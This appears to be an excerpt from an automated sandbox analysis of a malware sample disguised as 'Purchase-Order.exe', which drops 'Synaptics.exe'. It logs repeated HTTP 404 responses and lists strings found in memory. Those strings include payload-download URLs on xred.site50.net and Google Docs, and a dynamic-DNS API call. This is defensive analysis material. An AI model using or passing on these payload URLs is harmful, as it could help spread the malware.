                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5ddwSz1n9cFYO48_uU0h_Oo2xzHlLpAVZ74mUoWiKyP8siUmFt_dejRIIVA0nVEEI7Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:41 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-XkImY6AcuvjsWxy6i5yxog' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5sfNht_Xgj8Skt3ecnB5ehCtj0dpSNV1RJMtu5Ho2YMz10zI-hZ-_UeQvir7z_tyM0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:42 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-jvKgAxoGu4nzoSNOcSC3xQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6pUfaABfSf-dWJQPK2vJY5O7CRVTO_oha7Ie9UtuJsSvhoP-2ye2qRivOVVAvS1V0-Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:42 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-_qIszDJOIafS9uB8gXbX9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4EeF-KrlMOU9fGRZxADd7nQtrjV417swGGXq2FU78XiAgvi8h3jtI_s6r2RRjcGyZCContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:43 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-OYVMft4xVuAUdjglJ3757A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4hn1FypM29I7uCClVzaaszvZD6YjmWWWZZCc1gxMrYK2Ii0CYa14NEFnStfdHFxrTUN4pC6moContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:43 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-CnrwgvWnHHSQySYVgCY8qg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4iFNWjIpBJ5A5wFwyzI-pGuMBdDv0IadvCh2B1SaF4bkx8eDsnsHQxavreg3vVrwfSlJKkbLIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:44 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-LJjxbF4df3IE3FxXn5tcSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5OTPqJSltHH2q0f2QyzDjLuBql1p-TDKxKkSZxcM6VAE2d1KE7xiYQDeTvzwddej6kContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:45 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-dxh8pzbfFLgOrT2XAyvRNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5jN4wL6VewaazZlXdBvLBlNNXgOwkK5BtVY7ELBWRxugedVxed0OdTvW_Az7nwGnkGContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:45 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-_7Fd55M6k3GJbJ4x2TRZ_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC77TAfZKpoDa9jk5LOYmLWvA5i5Bu-TeB2h0xWdBzgO1B4_K6L0ayyI0NT4hzRxHifxUrjS5N8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:46 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-oL4U9pDC2rpmol0N_EQOcQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC54GHNv5UpbYikuRBhJT6dzKribGhwtXrc4hvOIjGnfs0SbaupCCwa0IGSJLP-XTtElKoN4tbkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:46 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-rshwtkVgrI2koWY4qBhkUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5hxAFSQKQtXYvHqU1dFPJERLkTGPGad0XXFicujN1_l-qF3BKC1A4tWWdJ07K3w-0MNT2GeMMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:47 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-6db4qPrBQ7WesfVnljSeRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5O4K-1yuiL1ULwxijJy9vUSm5CjrfkkQvY2b6bWpDv_fHrb-93fjYEbOOWbPPkjtOyContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:47 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-bImzyJwifhjMJI0VkXlryw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6i0uDz6ULFQ2nzidyWP4E6HQl4WZV4jCp5Pc2zFkhaeehEhbUZSfvzpqfuqDBtY-FABL-GWWcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:49 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-KUp8e_coqwTHb1q_-9755g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Jk-AatxyLMOJZMJSQFZE2gHRvw1wpWBm0yV8qa5c0R4rMRDRmmDBw7U3gvXBMKXdlpNJg9BAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:49 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-teNep-um0upWYCl89XGQJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5XslNffvXI3IQCT7eTUdE7ArAmVrXPCEvk1OIQq3xvdxOLhxj8g0AB8PRbFTg1AEJgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:50 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-NoTQsnBwe-FXu2StGj8ZbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7LaAi9ydFuxNwXWRtWJkR9KOqytyrPztE2P3wFsfCb-VL8XKCYGK2uw_-HKKECb16pContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:50 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-WoBB568VOZb7u_qxOncsew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5b67wufCf0DFP-KksY4MPQorgThrOM0O7_BaxYjHQcZWpIwIaCcKzfKIcJMuOx3brLContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:51 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-mpI_qCjIvtVGFI7gUpZVUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: Purchase-Order.exe, 00000000.00000000.1695406203.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2956093270.0000000002220000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1779135345.00000000005DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                Source: Purchase-Order.exe, 00000000.00000003.1704969935.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978h
                                Source: Purchase-Order.exe, 00000000.00000003.1704969935.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl4
                                Source: Purchase-Order.exe, 00000000.00000000.1695406203.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000002.00000002.2956093270.0000000002220000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1779135345.00000000005DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                                Source: Purchase-Order.exe, 00000000.00000000.1695406203.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000002.00000002.2956093270.0000000002220000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1779135345.00000000005DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                                Source: Purchase-Order.exe, 00000000.00000000.1695406203.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000002.00000002.2956093270.0000000002220000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1779135345.00000000005DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                                Source: Purchase-Order.exe, 00000000.00000003.1704969935.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarX
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.
                                Source: Synaptics.exe, 00000002.00000002.2953651739.00000000005BA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3012495090.000000001D481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3075003681.000000003B278000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                                Source: Synaptics.exe, 00000002.00000002.3076603001.000000003B2BD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3075003681.000000003B278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/a
                                Source: Synaptics.exe, 00000002.00000002.3097715360.0000000042BCE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3116678595.000000004D7FE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0;
                                Source: Purchase-Order.exe, 00000000.00000003.1704969935.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                                Source: Purchase-Order.exe, 00000000.00000000.1695406203.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000002.00000002.2956093270.0000000002220000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1779135345.00000000005DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                                Source: Purchase-Order.exe, 00000000.00000003.1704969935.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
